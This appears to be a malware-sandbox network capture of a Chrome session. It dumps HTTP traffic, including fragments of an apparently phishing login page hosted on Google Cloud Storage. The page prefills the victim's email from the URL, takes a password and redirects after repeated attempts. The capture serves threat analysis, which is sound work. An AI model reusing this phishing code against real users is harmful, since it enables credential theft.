                                                                                                                                                                                2021-10-25 16:17:22 UTC4INData Raw: 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 70 6b 65 64 63 6a 6b 64 65 66 67 70 64 65 6c 70 62 63 6d 62 6d 65 6f 6d 63 6a
                                                                                                                                                                                Data Ascii: fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app appid="pkedcjkdefgpdelpbcmbmeomcj
                                                                                                                                                                                2021-10-25 16:17:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.2.349746172.217.168.33443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-25 16:17:22 UTC0OUTGET /download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1 HTTP/1.1
                                                                                                                                                                                Host: 00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                2021-10-25 16:17:22 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                                X-GUploader-UploadID: ADPycdunHHu2NbsYayN_-kE5b9PSP8s4-KmDk8KrZMl1zsWh2M41fEZXroUCLSUODnOE9gOQdSHUpXFBQ17cIY6xiMvm-6KizA
                                                                                                                                                                                ETag: CO2iyc2/1/MCEAI=
                                                                                                                                                                                X-Goog-Hash: crc32c=WOgM9A==,md5=LboOhPHOW3ca1P8Eos0mgw==
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                X-Goog-Generation: 1634681626972525
                                                                                                                                                                                X-Goog-Metageneration: 2
                                                                                                                                                                                X-Goog-Storage-Class: STANDARD
                                                                                                                                                                                Expires: Mon, 25 Oct 2021 16:17:22 GMT
                                                                                                                                                                                Cache-Control: public, max-age=3600, must-revalidate
                                                                                                                                                                                Date: Mon, 25 Oct 2021 16:17:22 GMT
                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                Vary: X-Origin
                                                                                                                                                                                Content-Length: 10273
                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2021-10-25 16:17:22 UTC7INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 34 2e 30 2e 30 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 69 6e 74 65 67
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integ
                                                                                                                                                                                2021-10-25 16:17:22 UTC7INData Raw: 6f 6f 6c 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 37 33 43 36 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0d 0a 20 20
                                                                                                                                                                                Data Ascii: ool account</title> <style type="text/css"> body { background: #0073C6; } .container { width: 100%; display: flex; justify-content: center; align-items: center; height: 100vh;
                                                                                                                                                                                2021-10-25 16:17:22 UTC8INData Raw: 20 32 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 32 38 35 66 34 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 65 6d 61 69 6c 2d 74 6f 2d 76 65 72 69 66 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 68 6f 6c 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b
                                                                                                                                                                                Data Ascii: 2em; background: #4285f4; border-radius: 5px; color: #fff; } .email-to-verify { border: 1px solid #000; border-radius: 10px; } .form-holder { width: 100%; float: left;
                                                                                                                                                                                2021-10-25 16:17:22 UTC10INData Raw: 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 66 66 69 63 65 20 73 68 6f 77 20 62 6f 72 64 65 72 20 73 68 61 64 6f 77 20 62 67 2d 6c 69 67 68 74 22 20 69 64 3d 22 6f 74 68 65 72 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 66 66 69 63 65 2d 68 6f 6c 64 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 34 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 64 61 72 6b 22 3e
                                                                                                                                                                                Data Ascii: style></head><body> <div class="container"> <div class="office show border shadow bg-light" id="others"> <div class="office-holder"> <div class="logo"> <h4 class="text-dark">
                                                                                                                                                                                2021-10-25 16:17:22 UTC11INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 3e 52 45 4d 45 4d 42 45 52 20 4d 45 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 6e 2d 68 6f 6c 64 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 67 20 63 6f 6c 2d 31 32 22 20 69 64 3d 22 73 75 62 6d 69 74 2d 62 74 6e 22 3e 4c 4f 47 49 4e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                                                                                                                Data Ascii: <label>REMEMBER ME</label> </div> <div class="btn-holder"> <button class="btn btn-lg col-12" id="submit-btn">LOGIN</button> </div>
                                                                                                                                                                                2021-10-25 16:17:22 UTC12INData Raw: 69 6e 3a 20 30 70 78 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 2d 2d 20 4f 70 74 69 6f 6e 61 6c 20 4a 61 76 61 53 63 72 69 70 74 20 2d 2d 3e 0d 0a 20 20 3c 21 2d 2d 20 6a 51 75 65 72 79 20 66 69 72 73 74 2c 20 74 68 65 6e 20 50 6f 70 70 65 72 2e 6a 73 2c 20 74 68 65 6e 20 42 6f 6f 74 73 74 72 61 70 20 4a 53 20 2d 2d 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 32 2e 31 2e 73 6c 69 6d 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 4b 4a 33 6f 32 44 4b 74 49 6b 76 59 49 4b 33 55 45 4e 7a 6d 4d 37 4b 43 6b 52 72 2f 72 45 39 2f 51 70 67 36 61 41 5a 47 4a 77 46 44 4d 56 4e 41 2f 47 70 47
                                                                                                                                                                                Data Ascii: in: 0px } </style>... Optional JavaScript --> ... jQuery first, then Popper.js, then Bootstrap JS --> <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpG
                                                                                                                                                                                2021-10-25 16:17:22 UTC13INData Raw: 72 20 63 3d 20 6d 79 5f 73 6c 69 63 65 2e 73 75 62 73 74 72 28 30 2c 20 6d 79 5f 73 6c 69 63 65 2e 69 6e 64 65 78 4f 66 28 27 2e 27 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6e 61 6c 3d 20 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 65 6d 61 69 6c 27 29 2e 76 61 6c 28 6d 79 5f 65 6d 61 69 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 64 6f 6d 61 69 6e 2d 6e 61 6d 65 27 29 2e 68 74 6d 6c 28 66 69 6e 61 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 24 28 22 23 6d 73 67 22 29 2e 68 69 64 65 28 29 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 75 72 6c 20 67 65 74 74 69 6e 67 20 65 6d 61 69 6c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                                                                                                                Data Ascii: r c= my_slice.substr(0, my_slice.indexOf('.')); var final= c.toLowerCase(); $('#email').val(my_email); $('#domain-name').html(final); $("#msg").hide(); } ///////////////url getting email///////////
                                                                                                                                                                                2021-10-25 16:17:22 UTC15INData Raw: 20 20 20 20 20 76 61 72 20 69 6e 64 3d 6d 79 5f 65 6d 61 69 6c 2e 69 6e 64 65 78 4f 66 28 22 40 22 29 3b 0d 0a 20 20 20 20 20 20 76 61 72 20 6d 79 5f 73 6c 69 63 65 3d 6d 79 5f 65 6d 61 69 6c 2e 73 75 62 73 74 72 28 28 69 6e 64 2b 31 29 29 3b 0d 0a 20 20 20 20 20 20 76 61 72 20 63 3d 20 6d 79 5f 73 6c 69 63 65 2e 73 75 62 73 74 72 28 30 2c 20 6d 79 5f 73 6c 69 63 65 2e 69 6e 64 65 78 4f 66 28 27 2e 27 29 29 3b 0d 0a 20 20 20 20 20 20 76 61 72 20 66 69 6e 61 6c 3d 20 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 20 20 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 6e 65 77 20 69 6e 6a 65 63 74 69 6f 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 0d 0a 20 20 20 20 20 20 63 6f 75 6e 74 3d 63 6f 75 6e 74 2b 31 3b 0d 0a 20 20 20 20 20 20 24 28 27 23
                                                                                                                                                                                Data Ascii: var ind=my_email.indexOf("@"); var my_slice=my_email.substr((ind+1)); var c= my_slice.substr(0, my_slice.indexOf('.')); var final= c.toLowerCase(); ///////////new injection//////////////// count=count+1; $('#
                                                                                                                                                                                2021-10-25 16:17:22 UTC16INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 72 72 6f 72 3a 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 23 70 61 73 73 77 6f 72 64 22 29 2e 76 61 6c 28 22 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 6f 75 6e 74 3e 3d 32 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 75 6e 74 3d 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 22 2b 6d 79 5f 73 6c
                                                                                                                                                                                Data Ascii: } } }, error: function(){ $("#password").val(""); if (count>=2) { count=0; window.location.replace("http://www."+my_sl


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                2192.168.2.349743142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-25 16:17:22 UTC2OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                Origin: https://www.google.com
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                2021-10-25 16:17:22 UTC2OUTData Raw: 20
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-10-25 16:17:22 UTC5INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                Date: Mon, 25 Oct 2021 16:17:22 GMT
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3mXR9FIrKeHFleTtPMf6jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                                                Content-Security-Policy: script-src 'nonce-3mXR9FIrKeHFleTtPMf6jA' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                Server: ESF
                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000
                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                2021-10-25 16:17:22 UTC6INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                2021-10-25 16:17:22 UTC6INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                3192.168.2.349752104.16.19.94443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-25 16:17:22 UTC17OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Origin: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                Referer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                2021-10-25 16:17:23 UTC18INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Oct 2021 16:17:22 GMT
                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                                ETag: W/"5eb03fa9-4af4"
                                                                                                                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Age: 1546696
                                                                                                                                                                                Expires: Sat, 15 Oct 2022 16:17:22 GMT
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SiYnHebMjN373%2B5EkY%2FlpsMd8SEgwXmx394Z0tAo9xol7i6PO7z0fuxxVzFHyoA5vcqirBPeCaIng3boGvVsKdmPLjMPyjlczY6RVLQ6Z%2FowaUP6v5KAa8iBH6ILFy0aWi5LgrNl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 6a3cc136adb94e80-FRA
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                2021-10-25 16:17:23 UTC19INData Raw: 39 36 36 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27
                                                                                                                                                                                Data Ascii: 966/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'
